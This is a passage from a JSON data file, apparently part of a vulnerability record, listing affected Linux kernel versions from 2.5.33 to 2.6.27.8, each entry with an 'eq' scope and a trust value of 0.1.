        "version": "2.5.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.63"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.64"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.65"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.66"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.67"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.68"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.5.69"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.12.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.13.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.15.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.23"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.25"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.27"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.33"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.40"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.43"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.44"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.45"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.47"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.48"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.50"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.52"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.53"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.55"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.56"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.57"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.59"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.61"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.16.62"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.17.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.19.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.19.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.19.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.19.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.19.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.20.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.21.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.21.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.21.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.21.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.21.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.22.20"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
        "vendor": "linux",
        "version": "2.6.27.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.1,
